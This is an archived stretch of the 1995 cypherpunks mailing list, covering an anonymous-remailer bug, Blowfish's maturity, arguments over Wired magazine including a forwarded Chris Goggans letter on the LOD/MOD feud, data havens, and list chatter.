>
>

It was even possible to get eyewitness descriptions of much of the troop movement in Moscow in near real-time on #russia. The attack on the Russian White House was in particular quite interesting to watch on CNN and compare what was going on via irc comments.

From ianf at sydney.sgi.com Sun Jan 15 16:56:51 1995
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Sun, 15 Jan 95 16:56:51 PST
Subject: Crypto functions
In-Reply-To:
Message-ID: <9501161145.ZM27648@wiley.sydney.sgi.com>

On Jan 15, 10:35am, Jonathan Cooper wrote:
> > I wouldn't use BLOWFISH.
> Why?
Well, I wasn't the original person who said that they wouldn't use it, but I would agree. It's too new. It looks very good so far, but until it's been through a lot more analysis than Blowfish has received so far, it is too much of an unknown quantity.

Ian.

From aj at pcnet.com Sun Jan 15 17:00:00 1995
From: aj at pcnet.com (A.J. Janschewitz)
Date: Sun, 15 Jan 95 17:00:00 PST
Subject: Jude Milhon in WIRED
In-Reply-To:
Message-ID:

On Sun, 15 Jan 1995 rishab at dxm.ernet.in wrote:

> WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> member of the cypherpunks - a term that she coined." I didn't even know there
> _was_ a charter. The interview as such is mainly about why "girls _need_
> modems."

WiReD. What a waste of pulp; worse, what a waste of potential. A magazine that could have held the hands of aol novices and led them into the real net.world, and promoted freenets, and demonstrated the need for cryptosystems, and challenged the minds of net citizens decided to take the low road and become "USA Today" (for cypherpunks abroad, "USA-T" is a `newspaper' that looks like a big comic book, and doesn't trouble its readers with many syllables ... rather like Prodigy ...).

==a.j.==
--
"The large print giveth and the small print taketh away." - Tom Waits

From perry at imsi.com Sun Jan 15 17:19:37 1995
From: perry at imsi.com (Perry E. Metzger)
Date: Sun, 15 Jan 95 17:19:37 PST
Subject: Jude Milhon in WIRED
In-Reply-To:
Message-ID: <9501160118.AA05350@snark.imsi.com>

rishab at dxm.ernet.in says:
> WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> member of the cypherpunks - a term that she coined." I didn't even know there
> _was_ a charter.

Or a Jude Milhon, for that matter. Another example of the continuing decay of a once proud magazine...

Perry

From pstemari at erinet.com Sun Jan 15 17:45:38 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Sun, 15 Jan 95 17:45:38 PST
Subject: How do I know if its encrypted?
Message-ID: <9501160137.AA17721@eri.erinet.com>

>> newsgroups. Mandating encryption renders this mode useless.
>> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> At 02:42 AM 1/15/95 -0600, Larry E wrote:
>Here, I don't understand your point. If you mean an encrypted
>message to a remailer cannot result in a plaintext usenet posting,
>that of course is not true. The remailers have PGP keys of their
>own, just as any private user may. In addition, some of the
>remailers support direct usenet posting. Thus, a message may be
>encrypted to the remailer and posted as plaintext as the remailer
>decrypts the message.

I wasn't referring to requiring encryption using the remailer's public key. I was referring to the stuff discussed here, where the remailer operator insists on ensuring that the traffic is encrypted over and beyond the remailer's public key, in order to give the operator plausible deniability.

Really, all inbound remailer traffic should be encrypted with the remailer's public key if any significant level of security is desired.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From jml at wizard.synapse.net Sun Jan 15 18:03:44 1995
From: jml at wizard.synapse.net (jml at wizard.synapse.net)
Date: Sun, 15 Jan 95 18:03:44 PST
Subject: interesting problem with remailers
Message-ID: <199501160203.VAA07586@sentinel.synapse.net>

I need a good dependable cypherpunk style anonymous remailer. So I have been experimenting with a few. I have discovered a rather curious problem.

I have sent test messages to homer at rahul.net. These test messages read as follows:

::
Request-Remailing-To: myname at mydonain
Subject: Test
this is line1
this is line2
this is line3
this is line4
this is line5
this is line6

I have encrypted this message with the public key of homer at rahul.net using the pgp -ea command (for armour). This yields something like:

-----BEGIN PGP MESSAGE----
version 2.6.2
blahblahblah
blah blah blah blah etc.....
------END PGP MESSAGE---

I have then put

::
Encrypted: PGP

at the beginning of the message and sent it with Eudora PC 1.4.

Now curiously enough the message that I received back from homer at rahul is the following:

*************************************************************
To: myname at mysite
From: nobody at rahul.net
Subject: Test
Remailed-By: A Free Zone Remailer V1.2
Complaints-To: Homer Wilson Smith
X-Comments:
X-Comments: finger homer at rahul.net for instructions.
X-Comments:
X-Comments: Unauthorized or illegal use of this remailer, especially
X-Comments: for spamming the internet or posting copyright violations
X-Comments: will be prosecuted to the fullest extent of the law.
X-Comments: Homer Wilson Smith (607) 277-0959, Fax: (607) 277-8913
X-Comments: FULL HEADER LOGGING IS: ON

This is line1
this is line3
this is line5
*************************************************************

No this is line2
no this is line4
no this is line6

I am unable to explain this. Obviously the message must be received intact by the remailer because being encrypted with PGP if it were corrupt in any way it would simply not decode properly and I would get no reply whatsoever.

Now before somebody says that the trouble is at my site, I also have an account on CI$ (compuserve). The same thing happens to messages I received there. So obviously it cannot be my site. Unless I am doing something that somehow tells the remailer to only remail one line out of two. (?????)

And this problem is not only with homer at rahul. Other remailers do the same. I know that it must be something that I am doing but it escapes me what. Again it must receive the PGP message correctly. I am stumped....

If anybody can help explain this little mystery, it would be most appreciated.
Please reply here at cypherpunks at toad.com and also forward to wizard at alpha.c2.org (to see if it works)

Thanks all

From merriman at metronet.com Sun Jan 15 18:44:58 1995
From: merriman at metronet.com (David K. Merriman)
Date: Sun, 15 Jan 95 18:44:58 PST
Subject: hiatus
Message-ID: <199501160245.AA09108@metronet.com>

Just a short note to let folks know that I'll be unsubscribing for a while (probably a couple of months) while I get ready and then move to Amarillo to set up an ISP :-)

The staging phase is taking up a large portion of my time, and I really don't have the slack to do more than give the subject lines in the CP list a cursory glance these days - just enough to see what the current flame war is about :-)

Once I get the ISP set up, I'll be putting an anon remailer on it; I may also offer "Remailer-in-a-box" accounts for some relatively minor fee (if motivated, I may even take digicash as payment :-). I don't expect any problems about setting up accounts, since I'll be the MIS Manager, VP Engineering, etc, etc. Too, since the service will be commercial, I expect that I'll be able to do a pretty fair job of ignoring complaints of the kind that get .edu and on-the-left remailers shut down.

I'll still be able to receive email at this account at least until the end of February; once I get set up in Amarillo, I'll resub and let everyone know where I am (just in case anyone cares :-)

FYI, the tentative name for the ISP is panhandle.net.....

Dave Merriman
- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From paul at hawksbill.sprintmrn.com Sun Jan 15 18:58:12 1995 From: paul at hawksbill.sprintmrn.com (Paul Ferguson) Date: Sun, 15 Jan 95 18:58:12 PST Subject: ... and speaking of WiReD... Message-ID: <9501160258.AA09372@hawksbill.sprintmrn.com> Given the recent discussion on WireD, I thought some of you might enjoy this editorial (read: rant) authored by Erik Bloodaxe. Enjoy. - paul Forwarded message: > Date: Sun, 15 Jan 1995 20:34:00 CST > Reply-To: TK0JUT2 at MVS.CSO.NIU.EDU > Sender: CU-DIGEST list > From: "Cu Digest (tk0jut2 at mvs.cso.niu.edu)" > Subject: Cu Digest, #7.03 > To: Multiple recipients of list CUDIGEST > > Computer underground Digest Sun Jan 15, 1995 Volume 7 : Issue 03 > ISSN 1004-042X > > Editors: Jim Thomas and Gordon Meyer (TK0JUT2 at NIU.BITNET) > Archivist: Brendan Kehoe > Retiring Shadow Archivist: Stanton McCandlish > Shadow-Archivists: Dan Carosone / Paul Southworth > Ralph Sims / Jyrki Kuoppala > Ian Dickinson > Copy Reader: Laslo Toth > > CONTENTS, #7.03 (Sun, Jan 15, 1995) > > File 1--Open Letter to Wired Magazine (fwd) > File 2--More Legal Analysis of Steve Jackson Games (Legal Bytes) > File 3--The Stupid Net.Coverage News Awards -- 1994 and 1995 > File 4--Alliance for Community Media -- Call for Workshops > File 5--Cu Digest Header Info (unchanged since 25 Nov 1994) > > CuD ADMINISTRATIVE, EDITORIAL, AND SUBSCRIPTION INFORMATION APPEARS IN > THE CONCLUDING FILE AT THE END OF EACH ISSUE. 
>
> ----------------------------------------------------------------------
>
> Date: Sat, 14 Jan 1995 20:08:38 -0600 (CST)
> From: David Smith
> Subject: File 1--Open Letter to Wired Magazine (fwd)
>
> ---------- Forwarded message ----------
>
> >From--phrack at well.sf.ca.us (Chris Goggans)
> >Subject--Open Letter to Wired Magazine
> >Date--13 Jan 1995 00:51:09 GMT
>
> To Whom It May Concern:
>
> I am writing this under the assumption that the editorial staff at
> Wired will "forget" to print it in the upcoming issue, so I am also
> posting it on every relevant newsgroup and online discussion forum
> that I can think of.
>
> When I first read your piece "Gang War In Cyberspace" I nearly choked
> on my own stomach bile. The whole tone of this piece was so far
> removed from reality that I found myself questioning what color the
> sky must be in Wired's universe. Not that I've come to expect any
> better from Wired. Your magazine, which could have had the potential
> to actually do something, has become a parody...a politically correct
> art-school project that consistently falls short of telling the whole
> story or making a solid point. (Just another example of Kapor-Kash
> that ends up letting everyone down.)
>
> I did however expect more from Josh Quittner.
>
> I find it interesting that so much emphasis can be placed on an issue
> of supposed racial slurs as the focus of an imaginary "gang war,"
> especially so many years after the fact.
>
> It's also interesting to me that people keep overlooking the fact that
> one of the first few members of our own little Legion of Doom was
> black (Paul Muad'dib.) Maybe if he had not died a few years back that
> wouldn't be so quickly forgotten. (Not that it makes a BIT of
> difference what color a hacker is as long as he or she has a brain and
> a modem, or these days at least a modem.)
>
> I also find it interesting that a magazine can so easily implicate
> someone as the originator of the so-called "fighting words" that
> allegedly sparked this online-battle, without even giving a second
> thought as to the damage that this may do to the person so named. One
> would think that a magazine would have more journalistic integrity
> than that (but then again, this IS Wired, and political correctness
> sells magazines and satisfies advertisers.) Thankfully, I'll only have
> to endure one month of the "Gee Chris, did you know you were a racist
> redneck?" phone calls.
>
> It's further odd that someone characterized as so sensitive to insults
> allegedly uttered on a party-line could have kept the company he did.
> Strangely enough, Quittner left out all mention of the MOD member who
> called himself "SuperNigger." Surely, John Lee must have taken
> umbrage to an upper-middle class man of Hebrew descent so shamefully
> mocking him and his entire race, wouldn't he? Certainly he wouldn't
> associate in any way with someone like that...especially be in the
> same group with, hang out with, and work on hacking projects with,
> would he?
>
> Please, of course he would, and he did. (And perhaps he still
> does...)
>
> The whole "racial issue" was a NON-ISSUE. However, such things make
> exciting copy and garner many column inches so keep being rehashed.
> In fact, several years back when the issue first came up, the
> statement was cited as being either "Hang up, you nigger," or "Hey,
> SuperNigger," but no one was sure which was actually said. Funny how
> the wording changes to fit the slant of the "journalist" over time,
> isn't it?
>
> I wish I could say for certain which was actually spoken, but alas, I
> was not privy to such things. Despite the hobby I supposedly so
> enjoyed according to Quittner, "doing conference bridges," I abhorred
> the things.
We used to refer to them as "Multi-Loser Youps"
> (multi-user loops) and called their denizens "Bridge Bunnies." The
> bridge referred to in the story was popularized by the callers of the
> 5A BBS in Houston, Texas. (A bulletin board, that I never even got
> the chance to call, as I had recently been raided by the Secret
> Service and had no computer.) Many people from Texas did call the
> BBS, however, and subsequently used the bridge, but so did people from
> Florida, Arizona, Michigan, New York and Louisiana. And as numbers do
> in the underground, word of a new place to hang out caused it to
> propagate rapidly.
>
> To make any implications that such things were strictly a New York
> versus Texas issue is ludicrous, and again simply goes to show that a
> "journalist" was looking for more points to add to his (or her)
> particular angle.
>
> This is not to say that I did not have problems with any of the people
> who were in MOD. At the time I still harbored strong feelings towards
> Phiber Optik for the NYNEX-Infopath swindle, but that was about it.
> And that was YEARS ago. (Even I don't harbor a grudge that long.)
> Even the dozen or so annoying phone calls I received in late 1990 and
> early 1991 did little to evoke "a declaration of war." Like many
> people, I know how to forward my calls, or unplug the phone. Amazing
> how technology works, isn't it?
>
> Those prank calls also had about as much to do with the formation of
> Comsec as bubble-gum had to do with the discovery of nuclear fission.
> (I'm sure if you really put some brain power to it, and consulted
> Robert Anton Wilson, you could find some relationships.) At the risk
> of sounding glib, we could have cared less about hackers at Comsec.
> If there were no hackers, or computer criminals, there would be no
> need for computer security consultants. Besides, hackers account for
> so little in the real picture of computer crime, that their existence
> is more annoyance than something to actually fear.
>
> However, when those same hackers crossed the line and began tapping
> our phone lines, we were more than glad to go after them. This is one
> of my only rules of action: do whatever you want to anyone else, but
> mess with me and my livelihood and I will devote every ounce of my
> being to paying you back. That is exactly what we did.
>
> This is not to say that we were the only people from the computer
> underground who went to various law enforcement agencies with
> information about MOD and their antics. In fact, the number of
> hackers who did was staggering, especially when you consider the usual
> anarchy of the underground. None of these other people ever get
> mentioned and those of us at Comsec always take the lead role as the
> "narks," but we were far from alone. MOD managed to alienate the vast
> majority of the computer underground, and people reacted.
>
> All in all, both in this piece, and in the book itself, "MOD, The Gang
> That Ruled Cyberspace," Quittner has managed to paint a far too
> apologetic piece about a group of people who cared so very little
> about the networks they played in and the people who live there. In
> the last 15 years that I've been skulking around online, people in the
> community have always tended to treat each other and the computer
> systems they voyeured with a great deal of care and respect. MOD was
> one of the first true examples of a groupthink exercise in hacker
> sociopathy. Selling long distance codes, selling credit card numbers,
> destroying systems and harassing innocent people is not acceptable
> behavior among ANY group, even the computer underground.
>
> There have always been ego flares and group rivalries in the
> underground, and there always will be. The Legion of Doom itself was
> FOUNDED because of a spat between its founder (Lex Luthor) and members
> of a group called The Knights of Shadow.
These rivalries keep things
> interesting, and keep the community moving forward, always seeking the
> newest bit of information in a series of healthy one-upsmanship. MOD
> was different. They took things too far against everyone, not just
> against two people in Texas.
>
> I certainly don't condemn everyone in the group. I don't even know a
> number of them (electronically or otherwise.) I honestly believe that
> Mark Abene (Phiber) and Paul Stira (Scorpion) got royally screwed
> while the group's two biggest criminals, Julio Fernandez (Outlaw) and
> Allen Wilson (Wing), rolled over on everyone else and walked away free
> and clear. This is repulsive when you find out that Wing in particular
> has gone on to be implicated in more damage to the Internet (as Posse
> and ILF) than anyone in the history of computing. This I find
> truly disgusting, and hope that the Secret Service are proud of
> themselves.
>
> Imagine if I wrote a piece about the terrible treatment of a poor
> prisoner in Wisconsin who was bludgeoned to death by other inmates
> while guards looked away. Imagine if I tried to explain the fact that
> poor Jeff Dahmer was provoked to murder and cannibalism by the mocking
> of adolescent boys who teased and called him a faggot. How would you
> feel if I tried to convince you that we should look upon him with pity
> and think of him as a misunderstood political prisoner? You would
> probably feel about how I do about Quittner's story.
>
> 'Hacker' can just as easily be applied to "journalists" too, and with
> this piece Quittner has joined the Hack Journalist Hall of Fame,
> taking his place right next to Richard Sandza.
>
> Quittner did get a few things right. I do have a big cat named Spud,
> I do work at a computer company and I do sell fantastic t-shirts. Buy
> some.
>
> With Love,
>
> Chris Goggans
> aka Erik Bloodaxe
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> http://fringeware.com/staff/jonl
> --
_______________________________________________________________________________
Paul Ferguson
US Sprint                              tel: 703.689.6828
Managed Network Engineering            internet: paul at hawk.sprintmrn.com
Reston, Virginia USA                   http://www.sprintmrn.com

From pstemari at erinet.com Sun Jan 15 19:30:40 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Sun, 15 Jan 95 19:30:40 PST
Subject: FAREWELL TO A.R.S. (fwd)
Message-ID:

Now the cypherpunks are going to get blamed for anything that happens to the "Church" of Scientology. Sigh:

In article <3f86hh$6gj at ag.oro.net> smj at smudge.oro.net (Scott Jennings) writes:
> ...
>Homer Wilson Smith (homer at math.cornell.edu) wrote:
>: ... is a joke. Their rmgroup message did exactly nothing except create
>: 10 more newgroup message and a total war zone on alt.config. They are
>: not only pissing off the cypherpunks, but also pissing off the people
>: of alt.config. If they continue, this war may spread from the internet
>: into the real world as cypherpunks start to hack Church accounts and
>: communication lines everywhere, causing total disruption of Scientology.
>:
>: If all the cypherpunks and hackers and crackers and phone freaks
>: and virus writers of the world unite and start to 'rmgroup Scientology', who
>: do you think will win? ...

Paul J. Ste. Marie, pstemari at well.sf.ca.us, pstemari at erinet.com

From tcmay at netcom.com Sun Jan 15 20:30:18 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Sun, 15 Jan 95 20:30:18 PST
Subject: Jude Milhon in WIRED
In-Reply-To: <9501160118.AA05350@snark.imsi.com>
Message-ID: <199501160356.TAA09359@netcom2.netcom.com>

Perry E. Metzger wrote:
> rishab at dxm.ernet.in says:
> > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> > member of the cypherpunks - a term that she coined."
I didn't even know there
> > _was_ a charter.
>
> Or a Jude Milhon, for that matter. Another example of the continuing
> decay of a once proud magazine...

I'm not sure what Perry's not having heard of Jude Milhon is supposed to mean, or how "Wired" interviewing her is "another example of the continuing decay," etc.

In any case, Jude Milhon has been active in the hacker-writer community, going back to the 1970s. Steven Levy's "Hackers" has several pages on her role in various things happening in the Lee Felsenstein circle of folks (there may be some of you who have no idea who Lee is....I can only hope that when you find interviews with him you not assume decay is occurring).

More recently she was an editor at "Mondo 2000" and has had various connections to Cypherpunks.

Jude was indeed the coiner of the "cypherpunk" term, and was at most of the early meetings, for at least the first year. (My FAQ will have more information on how Jude came to think of the name and whatnot.)

She's not presently subscribed and hence can't speak up in this strange matter of how an interview with her implies a magazine is in decay. (I'm hoping this is not what Perry really meant, but I can't see any other interpretations based on what I quoted above.)

I just don't think Jude deserves this kind of casual trashing. While I haven't been reading "Mondo" regularly for a couple of years, and while I'm getting bored with "Wired," this doesn't mean that people being interviewed deserve trashing.

(Indeed, the "bleeding edge" trendiness of "Wired," say, means that nearly anything once "wired" is fated to be marked as "tired" by the "stimulate me!" Starbucks crowd of techno-yuppies. Unlike a more staid journal, like "Nature" or "The Economist," as examples, trendy techno-style mags like "Wired," "Spin," "boing boing," "Future Sex," and a hundred other wirehead variants of "Vogue" and "People" will appeal precisely to the style mavens who so fickly announce what is trendy and what is not.
Anyone who professes to be "disappointed" by "Wired" was clearly taken in by their hype. (For what it's worth, I still enjoy flipping through the pages, often finding one or two items that spark my thinking. No, much of it is junk. So what else is new?)

Oh, and on Rishab's original point about "charter members," I took this in the usual figurative sense. A charter member of the Cypherpunks is basically just a card-carrying member.

(Hint: Find your own cards.)

--Tim

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From erc at s116.slcslip.indirect.com Sun Jan 15 20:45:28 1995
From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sun, 15 Jan 95 20:45:28 PST
Subject: Jude Milhon in WIRED
In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com>
Message-ID:

> Jude was indeed the coiner of the "cypherpunk" term, and was at most of
> the early meetings, for at least the first year. (My FAQ will have
> more information on how Jude came to think of the name and whatnot.)

I, for one, would like to see this - I've only been on the list for a bit over two years, and I'd never heard of Jude, either.

--
Ed Carp, N7EKG                          Ed.Carp at linux.org, ecarp at netcom.com
801/534-8857 voicemail                  801/460-1883 digital pager
Finger ecarp at netcom.com for PGP 2.5 public key    an88744 at anon.penet.fi
** PGP encrypted email preferred! **

"How many beers have you had tonight, bro?"
"Seventy."
-- "Cops" From jml at wizard.synapse.net Sun Jan 15 20:50:35 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Sun, 15 Jan 95 20:50:35 PST Subject: bug in remailers Message-ID: <199501160449.XAA15798@sentinel.synapse.net> > If the remailers are working correctly, then one way you can be >getting garbled postings is if your files are being garbled while you are >pgping them. Have you tried to pgp your files TO YOURSELF, and then unpgp >them to see if they come out ok? Yes I have tried that. No problem they come out ok. > Does the bug happen on the remailers when things are not pgp'd? Well no problem with anon at penet.fi. I'll try other remailers that permit unpgp'ed messages and get back to you. From homer at math.cornell.edu Sun Jan 15 20:54:25 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Sun, 15 Jan 95 20:54:25 PST Subject: bug in remailers In-Reply-To: <199501160449.XAA15798@sentinel.synapse.net> Message-ID: I am getting the same errors, even without pgp! homer On Sun, 15 Jan 1995 jml at wizard.synapse.net wrote: > > If the remailers are working correctly, then one way you can be > >getting garbled postings is if your files are being garbled while you are > >pgping them. Have you tried to pgp your files TO YOURSELF, and then unpgp > >them to see if they come out ok? > > Yes I have tried that. No problem they come out ok. > > > Does the bug happen on the remailers when things are not pgp'd? > > Well no problem with anon at penet.fi. I'll try other remailers that permit > unpgp'ed messages and get back to you.
From jml at wizard.synapse.net Sun Jan 15 21:00:04 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Sun, 15 Jan 95 21:00:04 PST Subject: bug in remailers Message-ID: <199501160459.XAA15941@sentinel.synapse.net> > I am getting the same errors, even without pgp! > > homer Well to tell the truth I'm glad that I'm not the only one it's happening to. This seems a fairly serious problem. (To anonymous remailers sysadmin) Is this something new? Must be I guess. (Paranoid mode on). Sabotage? From homer at math.cornell.edu Sun Jan 15 21:03:12 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Sun, 15 Jan 95 21:03:12 PST Subject: bug in remailers In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net> Message-ID: Am looking to find out why... On Sun, 15 Jan 1995 jml at wizard.synapse.net wrote: > > I am getting the same errors, even without pgp! > > > > homer > > Well to tell the truth I'm glad that I'm not the only one it's happening to. > This seems a fairly serious problem. (To anonymous remailers sysadmin) Is > this something new? Must be I guess. (Paranoid mode on). Sabotage?
From entropy at IntNet.net Sun Jan 15 21:04:09 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 15 Jan 95 21:04:09 PST Subject: Crypto functions In-Reply-To: <9501161145.ZM27648@wiley.sydney.sgi.com> Message-ID: > Well, I wasn't the original person who said that they wouldn't use it, > but I would agree. It's too new. It looks very good so far, but until it's > been through a lot more analysis than Blowfish has received so far, it is > too much of an unknown quantity. Ah. Incidentally, I wasn't just being a wiseass when I asked why, I wanted to know. Has no one significantly cryptanalysed Blowfish yet? -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From jml at wizard.synapse.net Sun Jan 15 21:12:49 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Sun, 15 Jan 95 21:12:49 PST Subject: Interesting problem with remailers Message-ID: <199501160512.AAA16114@sentinel.synapse.net> >To: lce at wwa.com (Larry E) >From: jml at wizard.synapse.net >Subject: Re: Interesting problem with remailers >>Try pgp -eat instead of pgp -ea. Please let me know if that solves >>your problem; I'm curious. No doesn't make any difference. Seems I'm not the only one to have this problem.
From mg5n+ at andrew.cmu.edu Sun Jan 15 21:19:41 1995 From: mg5n+ at andrew.cmu.edu (Matthew J Ghio) Date: Sun, 15 Jan 95 21:19:41 PST Subject: interesting problem with remailers (answer to FAQ) In-Reply-To: Message-ID: > I have encrypted this message with the public key of homer at rahul.net > using the pgp -ea command (for armour). Use -t From homer at math.cornell.edu Sun Jan 15 21:24:33 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Sun, 15 Jan 95 21:24:33 PST Subject: bug in remailers In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net> Message-ID: Bug dead. It was unique to my remailer and was not a problem to other remailers. Christ, you just shouldn't let me near a keyboard. Rahul is out of reach for the moment, but I will fix it at first chance. Homer On Sun, 15 Jan 1995 jml at wizard.synapse.net wrote: > > I am getting the same errors, even without pgp! > > > > homer > > Well to tell the truth I'm glad that I'm not the only one it's happening to. > This seems a fairly serious problem. (To anonymous remailers sysadmin) Is > this something new? Must be I guess. (Paranoid mode on). Sabotage?
From homer at math.cornell.edu Sun Jan 15 21:39:50 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Sun, 15 Jan 95 21:39:50 PST Subject: bug in remailers In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net> Message-ID: OK, its fixed. Sorry. Homer On Sun, 15 Jan 1995 jml at wizard.synapse.net wrote: > > I am getting the same errors, even without pgp! > > > > homer > > Well to tell the truth I'm glad that I'm not the only one it's happening to. > This seems a fairly serious problem. (To anonymous remailers sysadmin) Is > this something new? Must be I guess. (Paranoid mode on). Sabotage? From tcmay at netcom.com Sun Jan 15 21:57:17 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 15 Jan 95 21:57:17 PST Subject: Jude Milhon in WIRED In-Reply-To: Message-ID: <199501160556.VAA05701@netcom19.netcom.com> Ed Carp [khijol Sysadmin] wrote: > > > Jude was indeed the coiner of the "cypherpunk" term, and was at most of > > the early meetings, for at least the first year. (My FAQ will have > > more information on how Jude came to think of the name and whatnot.) > > I, for one, would like to see this - I've only been on the list for a bit > over two years, and I'd never heard of Jude, either. It's in the Cyphernomicon FAQ...just grep for it.
--Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From shamrock at netcom.com Sun Jan 15 22:36:00 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 15 Jan 95 22:36:00 PST Subject: CP meeting lost&found Message-ID: Did anyone notice a left over coat at the CP meeting? My friend seems to be unable to locate his. It's a purple Timberland with white leather trims. The coat has very important mail in the inside pocket. Thanks, -- Lucky Green PGP encrypted mail preferred. From rrothenb at libws4.ic.sunysb.edu Sun Jan 15 22:42:17 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Sun, 15 Jan 95 22:42:17 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: <9501160642.AA07182@toad.com> A couple of days ago I wrote: > >[. . .] > >How does one keep a site from becoming a remote pirated-software exchange > >site? [. . . .] > > Simple. The file is deleted upon retrieval. > Assuming that data haven does. I imagine some wouldn't, to allow for long-term storage or retrieval by multiple parties (which, for data havens to be viable as a commodity would probably be supported in some way as a feature) > -- > Ben.Goren at asu.edu, Arizona State University School of Music > Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059.
Rob Rob Rothenburg Walking-Owl, SUNY @ Stony Brook From rrothenb at libws4.ic.sunysb.edu Sun Jan 15 22:50:06 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Sun, 15 Jan 95 22:50:06 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: <9501160649.AA07279@toad.com> A couple of days ago I wrote: > > such a service could become a magnet for the "elite warez" crowd... > > > What's wrong with young, curious eLiTiStS running storing sites for > mutual benefits ('warez')? Some say copyright is dead. Others have > taken this to their hearts, especially for private use, and I don't > blame them. Copyrighted data on a server in a jurisdiction that > doesn't acknowledge the copyrights - a prime use for Data Havens > when they come of age. I'm not saying anything is wrong with it.... just that it is a problem that can lead the "authorities" to try to shut down the site, esp. when the pornography bogieman wears out (pun intended ;). Strangely, even though it's more socially acceptable for people to use "borrowed" wares there's poorer arguments for defending it than "pornography"... hardly any cries of foul happen when a board or site is busted for pirated software than pornography. Basically, what I'm saying is that it's an issue that data haven admins should keep in mind (esp. if there's a fee): perhaps they can most safely be run in jurisdictions with lax or no copyright laws. > > Mats > Rob From grendel at netaxs.com Sun Jan 15 23:04:34 1995 From: grendel at netaxs.com (Michael Handler) Date: Sun, 15 Jan 95 23:04:34 PST Subject: Cryptanalysis of Blowfish (Was: Re: Crypto functions) In-Reply-To: Message-ID: On Sun, 15 Jan 1995, Jonathan Cooper wrote: > Has no one significantly cryptanalysed Blowfish yet? Bruce Schneier is running a contest. First person to come up with a significant attack against full Blowfish (no partial round variants) gets $1000. The contest ends in April.
Last time I heard, he had gotten a very interesting attack from someone, but not a complete one. He plans to reveal the results after the contest ends in April. -mbh- -- Michael Handler Civil Liberty Through Complex Mathematics Philadelphia, PA PGP Key ID FC031321 Print: 9B DB 9A B0 1B 0D 56 DA 61 6A 57 AD B2 4C 7B AF "Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme From wcs at anchor.ho.att.com Sun Jan 15 23:38:23 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Sun, 15 Jan 95 23:38:23 PST Subject: Jude Milhon in WIRED Message-ID: <9501160735.AA22438@anchor.ho.att.com> Oh, come on, Perry - your memory must be decaying. I've met Jude 3-4 times in the last 1.5 years, including at Bay Area cypherpunks meetings (the long boring photo-shoot for the NY Times Magazine, for instance), and it's been referred to in the past that "cypherpunks" was her pun. She's also the one who put out requests for character contributions to a novel she's doing, which went to the list. Besides, if you're grumpy that you haven't met someone, you need to get out here to the left coast more often - New York winters must be getting to you :-) Bill From jcorgan at scruznet.com Mon Jan 16 00:32:14 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Mon, 16 Jan 95 00:32:14 PST Subject: CP meeting lost&found Message-ID: >Did anyone notice a left over coat at the CP meeting? My friend seems to be >unable to locate his. It's a purple Timberland with white leather trims. >The coat has very important mail in the inside pocket. Yes. As we were leaving, Katy was asking around for the owner of the jacket. I assume she probably still has it or it is at SGI for safekeeping. == Johnathan Corgan "Violence is the last refuge of the incompetent." 
jcorgan at scruznet.com -Isaac Asimov

From wcs at anchor.ho.att.com Mon Jan 16 00:59:40 1995
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 16 Jan 95 00:59:40 PST
